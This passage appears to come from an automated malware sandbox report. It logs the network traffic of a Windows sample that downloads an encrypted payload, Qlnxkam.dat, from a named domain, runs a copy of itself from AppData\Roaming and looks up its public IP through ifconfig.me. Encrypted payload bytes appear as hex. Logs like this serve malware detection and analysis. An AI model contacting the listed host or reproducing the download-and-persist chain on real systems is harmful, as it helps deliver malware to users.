Jul 3, 2024 16:17:21.638094902 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.638114929 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.638745070 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.638765097 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.638797045 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.638803959 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.638832092 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.681180954 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.686589003 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.686608076 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.686695099 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.686706066 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.686736107 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.687316895 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.687362909 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.687388897 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.687395096 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.687422037 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.726669073 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.726692915 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.726739883 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.726763964 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.726777077 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.727329969 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.727344990 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.727380037 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.727389097 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.727396965 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.727405071 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.727411032 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.727441072 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.727446079 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.727469921 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.728128910 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.728144884 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.728243113 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.728252888 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.728641987 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.728679895 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.728693962 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.728699923 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.728715897 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.728765011 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.728801966 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.731342077 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.882251024 CEST	49712	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:21.887212992 CEST	80	49712	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:21.887341022 CEST	49712	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:21.887691975 CEST	49712	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:21.892831087 CEST	80	49712	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:22.370923996 CEST	80	49712	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:22.415564060 CEST	49712	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:22.623016119 CEST	49713	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:22.628057003 CEST	80	49713	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:22.628174067 CEST	49713	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:22.628499031 CEST	49713	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:22.633399963 CEST	80	49713	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:23.112396002 CEST	80	49713	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:23.165622950 CEST	49713	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:18:41.025778055 CEST	49705	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:18:41.031236887 CEST	80	49705	34.117.118.44	192.168.2.10
Jul 3, 2024 16:18:41.031330109 CEST	49705	80	192.168.2.10	34.117.118.44

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 16:16:56.017544985 CEST	54761	53	192.168.2.10	1.1.1.1
Jul 3, 2024 16:16:56.041095018 CEST	53	54761	1.1.1.1	192.168.2.10
Jul 3, 2024 16:17:00.485748053 CEST	55276	53	192.168.2.10	1.1.1.1
Jul 3, 2024 16:17:00.496995926 CEST	53	55276	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 16:16:56.017544985 CEST	192.168.2.10	1.1.1.1	0xb29f	Standard query (0)	nexoproducciones.cl	A (IP address)	IN (0x0001)	false
Jul 3, 2024 16:17:00.485748053 CEST	192.168.2.10	1.1.1.1	0x8bcb	Standard query (0)	ifconfig.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 16:16:56.041095018 CEST	1.1.1.1	192.168.2.10	0xb29f	No error (0)	nexoproducciones.cl	104.21.10.178	A (IP address)	IN (0x0001)	false
Jul 3, 2024 16:16:56.041095018 CEST	1.1.1.1	192.168.2.10	0xb29f	No error (0)	nexoproducciones.cl	172.67.146.41	A (IP address)	IN (0x0001)	false
Jul 3, 2024 16:17:00.496995926 CEST	1.1.1.1	192.168.2.10	0x8bcb	No error (0)	ifconfig.me	34.117.118.44	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

nexoproducciones.cl

ifconfig.me

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49705	34.117.118.44	80	7912	C:\Users\user\Desktop\6Ek4nfs2y1.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 16:17:00.508558989 CEST	63	OUT	GET /ip HTTP/1.1 Host: ifconfig.me Connection: Keep-Alive
Jul 3, 2024 16:17:01.010091066 CEST	162	IN	HTTP/1.1 200 OK date: Wed, 03 Jul 2024 14:17:00 GMT content-type: text/plain Content-Length: 11 access-control-allow-origin: * via: 1.1 google Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Jul 3, 2024 16:17:01.261754990 CEST	162	IN	HTTP/1.1 200 OK date: Wed, 03 Jul 2024 14:17:00 GMT content-type: text/plain Content-Length: 11 access-control-allow-origin: * via: 1.1 google Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49712	34.117.118.44	80	7536	C:\Users\user\AppData\Roaming\Qulzerug.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 16:17:21.887691975 CEST	63	OUT	GET /ip HTTP/1.1 Host: ifconfig.me Connection: Keep-Alive
Jul 3, 2024 16:17:22.370923996 CEST	162	IN	HTTP/1.1 200 OK date: Wed, 03 Jul 2024 14:17:21 GMT content-type: text/plain Content-Length: 11 access-control-allow-origin: * via: 1.1 google Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49713	34.117.118.44	80	1384	C:\Users\user\AppData\Roaming\Qulzerug.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 16:17:22.628499031 CEST	63	OUT	GET /ip HTTP/1.1 Host: ifconfig.me Connection: Keep-Alive
Jul 3, 2024 16:17:23.112396002 CEST	162	IN	HTTP/1.1 200 OK date: Wed, 03 Jul 2024 14:17:22 GMT content-type: text/plain Content-Length: 11 access-control-allow-origin: * via: 1.1 google Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49704	104.21.10.178	443	7364	C:\Users\user\Desktop\6Ek4nfs2y1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 14:16:56 UTC	80	OUT	GET /Qlnxkam.dat HTTP/1.1 Host: nexoproducciones.cl Connection: Keep-Alive
2024-07-03 14:16:57 UTC	687	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 14:16:57 GMT Transfer-Encoding: chunked Connection: close last-modified: Wed, 26 Jun 2024 08:23:45 GMT Cache-Control: max-age=2592000 expires: Fri, 02 Aug 2024 14:16:57 GMT vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2Ff5zmGaW4qC6gzXRuMamd3VEbRjpL%2Ff8d224uzXUt%2FlfwU9xKNruizJBccFKMXz8Y5B8Pr0wesKIQ2F%2FeL%2BH47vC5UEaFZ46%2FuNJrZX9ivktC%2FBnpXv0q2LwUOjbgN6BM7%2BWOPq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d77f0a78ce41f3-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 14:16:57 UTC	682	IN	Data Raw: 31 65 62 39 0d 0a 2c b2 2b 48 9f af 6d cc 6e 66 c9 60 11 41 de ac 52 d9 7c 3a c2 d0 d9 15 e5 02 e6 ca 84 a3 05 bc cc ca f5 cf 7a ce cc 90 7b 8d 86 69 82 9c 9f 28 95 14 50 94 4a 00 8d 52 84 db dd 71 75 3e 9e 73 e0 ad 51 b6 1c 4a e0 43 bf ef c4 f9 d0 25 07 26 6a 4e d7 fc 1a 45 d3 b3 bd 09 09 83 45 3a 7c e2 2c 6e 29 39 0e 5d 55 c3 d6 fe 0c 42 ae de d5 87 85 52 81 0a 76 4a 0f e1 a7 fb 3d a6 5e a2 77 fe 4d f0 35 d1 ec c6 5a c0 db 59 8e bf 2d 67 8e c2 df 5f d8 c0 50 7e 86 18 bd 68 d8 96 0d 51 ec 2a dd 41 19 c3 a3 be 09 66 10 2c 0b e2 13 96 83 e2 36 9a 71 d6 2f 88 13 80 13 21 84 6e 6e 47 62 9d 02 79 f7 d7 f6 31 a3 89 c1 b8 e8 73 e8 bf 31 be 95 83 26 c0 3e 93 da 1d 00 cf 14 24 d1 27 46 e9 bf 98 51 12 b6 46 4a 3f 14 6e 03 bf a6 da 60 f8 0c 7b db 89 e0 f4 e3 c8 18 Data Ascii: 1eb9,+Hmnf`AR\|:z{i(PJRqu>sQJC%&jNEE:\|,n)9]UBRvJ=^wM5ZY-g_P~hQ*Af,6q/!nnGby1s1&>$'FQFJ?n`{
2024-07-03 14:16:57 UTC	1369	IN	Data Raw: 74 f6 a9 7e 92 4d 51 a0 a0 fd a6 46 15 63 f2 df 95 13 a8 1b ee 9e e9 98 e3 7d 55 a9 71 02 6e 81 8a c1 2e d5 20 2e 6d 37 4f 94 13 e1 01 a2 0b 8f dd 32 0a a8 9e 50 44 fb c0 fb 44 ce 95 85 d5 1d 6a 68 4f ae 94 bd eb b7 b1 29 cd ab a3 b9 75 1c 7e ef f1 06 9d 2b d4 6f d7 7d 58 7d bd 06 72 08 76 b6 2d 49 75 64 83 f7 ef 30 fe 8e d9 a0 22 31 d7 c0 5b 68 b8 35 68 9d ae 0f 37 e1 af b7 67 c6 dc a3 da dd 59 02 aa 45 87 af 18 8b 21 00 d1 00 8d 9d b7 4a 2e b0 47 c5 7b 5b b0 3b 33 29 50 63 34 1f 10 f6 d1 44 9d 40 53 98 92 80 7d f4 99 d2 ac 4d 91 e3 90 01 b0 f5 41 34 ab b4 6d 0b a0 2b 20 1f 62 2f a2 60 38 d5 2d b8 23 51 b3 05 e2 55 75 06 cb f7 b9 aa e7 e9 9b 9a e1 20 47 a5 e4 5c ea 0d 6b b1 1c 80 db 85 98 4c b7 2a f2 8d f7 c7 da f5 66 ed 20 3d 60 98 20 7c 87 a4 6b 98 29 Data Ascii: t~MQFc}Uqn. .m7O2PDDjhO)u~+o}X}rv-Iud0"1[h5h7gYE!J.G{[;3)Pc4D@S}MA4m+ b/`8-#QUu G\kL*f =` \|k)
2024-07-03 14:16:57 UTC	1369	IN	Data Raw: f8 f9 00 86 20 29 a2 f7 d4 8d bf 09 59 f5 20 1a e5 50 3a d5 3a 0c b0 22 b8 85 8f cc dd 55 13 69 56 ff cb 7c 1d d9 68 8f 77 d1 9b 01 d9 3a 25 92 9d ec a2 e6 c7 65 fb 3b 0c 22 2b 36 b3 f0 fb cc 82 04 62 61 b1 6a 9e ea 0a 83 a5 03 49 df 38 96 09 1a 25 af fe d9 b5 99 ca a7 3a c4 99 53 85 74 b0 af 77 41 66 15 48 76 aa 59 06 4e 75 e3 0e 79 7f 03 c6 e2 ab 86 8b 1c 5f 4e 99 00 60 b5 a5 60 03 bb 20 c8 95 77 e8 b8 00 50 21 d5 de 0d 63 6a a1 cd 7e 2b e5 a5 2d 99 50 ca fb 5c e9 41 8f 68 19 55 06 0d ad c8 07 c5 fd d6 9b 51 a9 09 90 c2 7e 95 ec 92 8b 84 43 f6 d6 7f a9 73 00 a8 a2 8b e9 93 66 93 e9 63 92 ac 42 04 75 45 fe dd ad b6 fe 88 6d ab 1e ff 3a ef 2f ae a3 1c 02 2f 82 67 8c a3 1b 78 c4 4b 88 2a 94 59 6b a7 44 5b df 82 77 0a e2 60 c0 25 cc 3f 41 0b 82 b9 18 c0 ce Data Ascii: )Y P::"UiV\|hw:%e;"+6bajI8%:StwAfHvYNuy_N`` wP!cj~+-P\AhUQ~CsfcBuEm://gxK*YkD[w`%?A
2024-07-03 14:16:57 UTC	1369	IN	Data Raw: 2e a7 24 94 1d e5 c7 f2 43 22 99 b0 cf 27 b3 73 f1 ed 48 db b7 9b 8e be 96 bf c2 1d c1 19 34 c4 bc fa ce 03 8f c9 a3 bb 70 5e 8f 2e 3e 9e 05 da e8 7e 82 5a 14 6f 5f 43 1e e8 c4 9e 67 65 a9 1b dd 8b 3b ad 44 1c a7 4a 97 6e 40 90 65 2a bf 35 a5 cd bf fe 12 e4 ff 31 63 2d 94 da ac d6 77 c0 75 ac 68 bf 6d 2f d2 8f 16 cc 81 fc 6c c3 d3 95 36 c3 d7 aa 1f fe f3 cf e8 49 22 8c 86 c9 f0 82 5d 61 fc a5 7f 39 a3 49 4e 10 b6 1d ff 9f a2 54 2a 6c 29 79 c7 25 5c 7f 8d 68 e8 5e 98 a9 54 ab db 66 96 4a cd 64 35 53 6f db 40 60 04 82 44 d3 9e 3e fc 96 87 23 8e eb 4f 6b 5b 6e 44 48 1a ba 80 5a c8 68 04 a0 8e db a9 9b 5a 06 b0 eb da 61 5d 14 6a 47 1e 83 90 84 70 cf da 2e 61 fd 76 22 c7 93 93 96 39 33 bc 87 1e d4 7f a8 ba f9 42 34 fe 8d 23 7f 53 cc 54 36 59 e2 f4 c7 8e 35 cc Data Ascii: .$C"'sH4p^.>~Zo_Cge;DJn@e51c-wuhm/l6I"]a9INTl)y%\h^TfJd5So@`D>#Ok[nDHZhZa]jGp.av"93B4#ST6Y5
2024-07-03 14:16:57 UTC	1369	IN	Data Raw: f8 c4 ef 0c 21 0c 81 08 5e 28 fe ce 27 c7 98 1c 9a 77 bc 7b 09 cb 41 b3 7b 01 6b 2d af 79 a3 96 71 02 e0 ac c0 04 e9 d5 46 81 e6 13 87 fb 62 7b 39 fd 09 3e 39 fe f4 65 97 59 0c c8 bc 51 5b 91 82 3f f1 9a d6 4d 59 8d 28 3e 46 c4 b9 4e b8 55 7d 97 db f0 5b 49 e0 15 9c ff 85 94 9a 7c 55 a1 80 fa 9f bb 74 9f ac de 22 99 95 db 22 fa d3 fc 5c d7 ec 38 17 ba d6 93 f4 8c 04 5c 13 b3 7c 2d df ea 9e c1 5a 9d 00 ac e8 07 b3 07 85 a6 84 00 ee 37 7a 00 27 16 9f 8a 0d 5e 29 6d 65 61 9f db 3c e1 95 1d 70 26 5b 9b 00 69 6b 22 1d 78 de bb 45 e2 6b a5 69 1b 62 6e ef 5f 88 fa 2e f1 ca 10 09 2f 4a 92 ca 90 c1 0d af f6 63 bd db b2 0e 98 6b 95 6f fd 8c 02 85 d3 4b 3b d8 17 31 c2 24 c4 a6 2c 1b 41 d1 d7 7a 65 59 61 08 06 8b fd 3e 9e e0 b5 3b 0c b7 59 00 e7 c4 e1 64 cb 5c 97 5c Data Ascii: !^('w{A{k-yqFb{9>9eYQ[?MY(>FNU}[I\|Ut""\8\\|-Z7z'^)mea<p&[ik"xEkibn_./JckoK;1$,AzeYa>;Yd\\
2024-07-03 14:16:57 UTC	1369	IN	Data Raw: b4 71 61 0e 2a b4 ca 06 a0 ed 24 56 37 bf bb d0 06 38 44 66 b5 63 0f e3 5e 15 03 4f 32 6d 11 5e 7c 05 39 3a 3b 86 75 14 e8 23 2d e0 31 cb 0d b6 13 05 d3 fd 2e ec 2f 36 09 54 84 33 40 a0 7d d4 a3 78 5e 45 36 e1 7f 54 9d d9 d6 fa 3a 5e 4f 04 cf c3 d7 57 28 ee 84 66 5a 4a 26 3b 4c a9 32 fb 06 58 5a 7e c7 7d e7 81 01 b7 93 7e ca 7f 02 d7 38 cb de a3 c1 31 f7 e0 29 55 c3 b7 7c 4e 85 3f 05 92 b4 da 1d ff fe 89 b4 eb 2a 7b 1e 25 8b b1 a4 b9 f4 31 f0 2d 4e d3 b4 d3 40 97 eb 67 04 45 66 22 72 1e 93 cf c5 90 be 1d ae 9b 27 c3 b9 a5 14 f7 da 54 99 3a c1 08 71 81 ee ea a0 88 e3 e4 61 f3 ca dc b8 3f 3b 86 7b e0 9d 43 3d 18 04 d4 49 4a 02 3c fe 79 76 0e 52 35 bf 67 28 72 b6 50 57 b6 fe 9e df 23 bd 58 ae 1a 89 be 04 d7 8f e9 e9 59 ec a3 2d 8b 21 27 fa 17 75 b2 16 f2 21 Data Ascii: qa$V78Dfc^O2m^\|9:;u#-1./6T3@}x^E6T:^OW(fZJ&;L2XZ~}~81)U\|N?{%1-N@gEf"r'T:qa?;{C=IJ<yvR5g(rPW#XY-!'u!
2024-07-03 14:16:57 UTC	346	IN	Data Raw: 5b 71 a9 82 0a 68 d3 6a 71 cb 1c 25 34 a9 29 fd 35 27 6a 35 3e 4c 99 d2 18 49 f6 0f 43 18 d1 81 87 ce 0f 92 a3 f8 39 f3 c4 a7 d8 87 0a 78 be 32 54 9e 9b 5a 9e 09 38 66 bc d1 5a b0 f5 57 0a 72 6b 03 62 3b 53 eb e8 4d 62 a3 29 d8 34 8a c0 b4 d3 2e 71 62 b7 9e 30 cd 62 e7 51 da 22 36 4d 37 bb 91 54 05 69 44 2e 11 16 ed ee 6c 3b c9 18 cc 7b 25 93 e3 11 b8 8f 99 f4 43 cc 9c b7 8b 00 63 ec 6d d1 bd a2 62 b7 62 4c ce cc 5f 52 54 5f f9 b0 07 f0 55 ff 57 c0 0b 27 0e 3c d1 de 52 61 c2 7a bb 8e 53 26 69 cd 10 51 07 58 ea 4c fc bc 9a f7 d6 77 8d 8c aa 73 fc 67 37 24 3b 41 ed 25 19 99 09 86 10 a2 4a 43 e1 df 66 0b ed 3f dd 17 7a af b0 73 e2 1a 60 09 08 f8 e6 12 0a 2a 40 80 96 2e 2d 56 6e 7a 0d 8e f7 89 fc 7e 91 a1 82 9b df 74 47 e8 04 ca ee 00 ba 1f 4d 13 a1 a4 91 04 Data Ascii: [qhjq%4)5'j5>LIC9x2TZ8fZWrkb;SMb)4.qb0bQ"6M7TiD.l;{%CcmbbL_RT_UW'<RazS&iQXLwsg7$;A%JCf?zs`*@.-Vnz~tGM
2024-07-03 14:16:57 UTC	1369	IN	Data Raw: 36 30 31 34 0d 0a 77 6d d1 71 6d 65 69 d0 98 f3 40 af 0b c9 d6 2e 2b 01 34 a5 88 7c 1b a0 aa d3 f9 0d 22 d1 8d dc 75 8e f8 4c ee c5 74 a0 8c 70 39 c0 93 6a 9b 2c 0a c5 f7 16 3d ca ca 96 0c c1 3c d7 74 1c 2e 1e 21 ec d7 0f 7e 28 4b 21 e5 aa 41 0d fd 27 2d 43 11 f1 6a 58 a8 f3 69 98 3e 97 40 b7 f5 ce 3c 4a dc 3e a0 61 65 26 04 15 00 0c 7d 9a 57 f4 eb 62 53 f1 e5 10 0b d2 89 f5 b2 a4 70 ee a2 6f b0 86 bf 9f a5 74 94 c3 d1 68 f8 7f 80 e6 00 cb c5 3e cd d7 e7 a9 51 99 6d 3c 9c 2e fe ce 39 38 c6 97 43 87 ce 96 71 97 66 a6 69 35 94 d5 ae 76 a7 50 ae 74 b1 5b c4 53 53 4b c2 fb aa 98 89 73 b4 5b 06 f7 e1 03 d9 a4 02 6d d0 b6 dc 81 ae 15 c0 49 6e 77 18 b5 e5 d5 ce b3 75 47 c4 b6 83 a0 4d cd e9 8d 7f f3 22 75 79 38 23 5c c7 dc 72 16 e8 a7 ec 1d 51 99 f8 b7 c7 bc 6d Data Ascii: 6014wmqmei@.+4\|"uLtp9j,=<t.!~(K!A'-CjXi>@<J>ae&}WbSpoth>Qm<.98Cqfi5vPt[SSKs[mInwuGM"uy8#\rQm
2024-07-03 14:16:57 UTC	1369	IN	Data Raw: ca 5d 08 71 ba 25 4b ae 6a 33 a8 ff 1f 2e b1 85 52 c2 7a 88 31 11 03 11 76 ae 5b f4 45 c6 c8 60 6a 2f 87 e1 24 b1 4c 30 f6 25 20 55 aa f7 29 c5 43 60 53 53 c9 30 a9 bb 60 52 e8 0b af e8 50 34 d7 09 28 7f 37 c7 85 5c 07 91 89 01 ef 5d 5c 5d 1c ea 9e b9 49 ed 27 e8 67 17 23 49 cd e7 05 bb 96 0c b9 59 24 da d1 21 a2 58 67 40 c2 14 9a 07 69 13 ea 97 7d 37 fd 9c 9f c9 67 02 b5 c1 ed e2 c0 6a 01 08 7e 88 77 df 95 3d 39 27 0a af 22 ff 38 d7 46 68 92 2e 07 7b 44 60 68 5e cd b7 51 54 2a 30 e2 1a 63 f3 fe 65 0c ca 8e cd b3 da 38 57 a1 14 fb 48 b5 09 94 24 ab 4e 1d f5 2a 7c 6c 48 54 2a da 12 85 39 42 aa 0b 58 c9 c4 09 93 98 13 08 6b 4a ac bc 9a eb 2a a7 fe a6 6c b2 8e e9 56 8b bb 0e af 40 18 c8 aa a1 da 85 cd 99 ef 96 16 75 aa b3 56 0a 29 89 8c 6c e4 4d 0c c0 be 83 Data Ascii: ]q%Kj3.Rz1v[E`j/$L0% U)C`SS0`RP4(7\]\]I'g#IY$!Xg@i}7gj~w=9'"8Fh.{D`h^QT0ce8WH$N\|lHT9BXkJlV@uV)lM
2024-07-03 14:16:57 UTC	1369	IN	Data Raw: 20 d6 96 a2 51 f8 c6 62 d0 b5 2e 41 b4 bc 1a 85 4a 92 a1 20 5c f6 0f 8d bf b4 b3 05 b2 c6 34 b1 83 fe ca 9b 1d d3 ad be 69 de f8 68 32 16 94 a2 db 3f 2a 3f 89 ae b5 29 0c d6 bb 1e 64 3a ee cd f3 96 c9 f4 6f 4c 2c d9 9b b8 50 82 5a a8 c1 0f 90 fd 96 27 55 3f ac fb c2 35 69 48 dd f0 fc 37 a2 62 4d 9a 45 c9 bd 0d bc a9 65 32 74 4e d5 aa 1b fa ab 42 ab 6c 4e 45 49 4d 05 85 c1 fa 24 a9 50 2e 0b 60 73 60 a9 26 ef df ab 02 e6 72 b9 00 33 f5 b1 f3 49 4e 97 58 ae 9f 5a aa d3 09 ee 25 2f 3d 12 ad 02 75 5b 93 d3 83 75 9d a9 1c 87 03 8c d3 6b f3 bf f7 53 36 73 d7 d9 3e 6e 10 63 12 10 d5 ac d4 c6 4c 58 8c 55 b2 b8 e7 d4 7e 94 bd 18 f2 7a b9 8e c9 9e dc af a9 e3 11 3f 31 67 4b 89 84 bd cf d6 02 f1 84 b1 03 e7 1c 50 02 f6 6d c5 9c ae da 3c 9f ca 6b 8b c8 46 4e 84 01 1d Data Ascii: Qb.AJ \4ih2?*?)d:oL,PZ'U?5iH7bMEe2tNBlNEIM$P.`s`&r3INXZ%/=u[ukS6s>ncLXU~z?1gKPm<kFN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49706	104.21.10.178	443	8060	C:\Users\user\AppData\Roaming\Qulzerug.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 14:17:11 UTC	80	OUT	GET /Qlnxkam.dat HTTP/1.1 Host: nexoproducciones.cl Connection: Keep-Alive
2024-07-03 14:17:12 UTC	687	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 14:17:12 GMT Transfer-Encoding: chunked Connection: close last-modified: Wed, 26 Jun 2024 08:23:45 GMT Cache-Control: max-age=2592000 expires: Fri, 02 Aug 2024 14:17:12 GMT vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KNqCqrCCg9n3G3nwoN%2FoS1U0BxoJVctAi%2Ber9leZl3LI5at8JKICOTpVzWpK3R0%2FgzWPjql%2FWkV5GVUgiGiUkG1q5HNjmrYZ97xbJqToUvNi%2FWMTFYy1%2BmFf6t8eE1zr5Ck%2F%2Bt4l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d77f659f81c47a-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 14:17:12 UTC	682	IN	Data Raw: 31 65 62 39 0d 0a 2c b2 2b 48 9f af 6d cc 6e 66 c9 60 11 41 de ac 52 d9 7c 3a c2 d0 d9 15 e5 02 e6 ca 84 a3 05 bc cc ca f5 cf 7a ce cc 90 7b 8d 86 69 82 9c 9f 28 95 14 50 94 4a 00 8d 52 84 db dd 71 75 3e 9e 73 e0 ad 51 b6 1c 4a e0 43 bf ef c4 f9 d0 25 07 26 6a 4e d7 fc 1a 45 d3 b3 bd 09 09 83 45 3a 7c e2 2c 6e 29 39 0e 5d 55 c3 d6 fe 0c 42 ae de d5 87 85 52 81 0a 76 4a 0f e1 a7 fb 3d a6 5e a2 77 fe 4d f0 35 d1 ec c6 5a c0 db 59 8e bf 2d 67 8e c2 df 5f d8 c0 50 7e 86 18 bd 68 d8 96 0d 51 ec 2a dd 41 19 c3 a3 be 09 66 10 2c 0b e2 13 96 83 e2 36 9a 71 d6 2f 88 13 80 13 21 84 6e 6e 47 62 9d 02 79 f7 d7 f6 31 a3 89 c1 b8 e8 73 e8 bf 31 be 95 83 26 c0 3e 93 da 1d 00 cf 14 24 d1 27 46 e9 bf 98 51 12 b6 46 4a 3f 14 6e 03 bf a6 da 60 f8 0c 7b db 89 e0 f4 e3 c8 18 Data Ascii: 1eb9,+Hmnf`AR\|:z{i(PJRqu>sQJC%&jNEE:\|,n)9]UBRvJ=^wM5ZY-g_P~hQ*Af,6q/!nnGby1s1&>$'FQFJ?n`{
2024-07-03 14:17:12 UTC	1369	IN	Data Raw: 74 f6 a9 7e 92 4d 51 a0 a0 fd a6 46 15 63 f2 df 95 13 a8 1b ee 9e e9 98 e3 7d 55 a9 71 02 6e 81 8a c1 2e d5 20 2e 6d 37 4f 94 13 e1 01 a2 0b 8f dd 32 0a a8 9e 50 44 fb c0 fb 44 ce 95 85 d5 1d 6a 68 4f ae 94 bd eb b7 b1 29 cd ab a3 b9 75 1c 7e ef f1 06 9d 2b d4 6f d7 7d 58 7d bd 06 72 08 76 b6 2d 49 75 64 83 f7 ef 30 fe 8e d9 a0 22 31 d7 c0 5b 68 b8 35 68 9d ae 0f 37 e1 af b7 67 c6 dc a3 da dd 59 02 aa 45 87 af 18 8b 21 00 d1 00 8d 9d b7 4a 2e b0 47 c5 7b 5b b0 3b 33 29 50 63 34 1f 10 f6 d1 44 9d 40 53 98 92 80 7d f4 99 d2 ac 4d 91 e3 90 01 b0 f5 41 34 ab b4 6d 0b a0 2b 20 1f 62 2f a2 60 38 d5 2d b8 23 51 b3 05 e2 55 75 06 cb f7 b9 aa e7 e9 9b 9a e1 20 47 a5 e4 5c ea 0d 6b b1 1c 80 db 85 98 4c b7 2a f2 8d f7 c7 da f5 66 ed 20 3d 60 98 20 7c 87 a4 6b 98 29 Data Ascii: t~MQFc}Uqn. 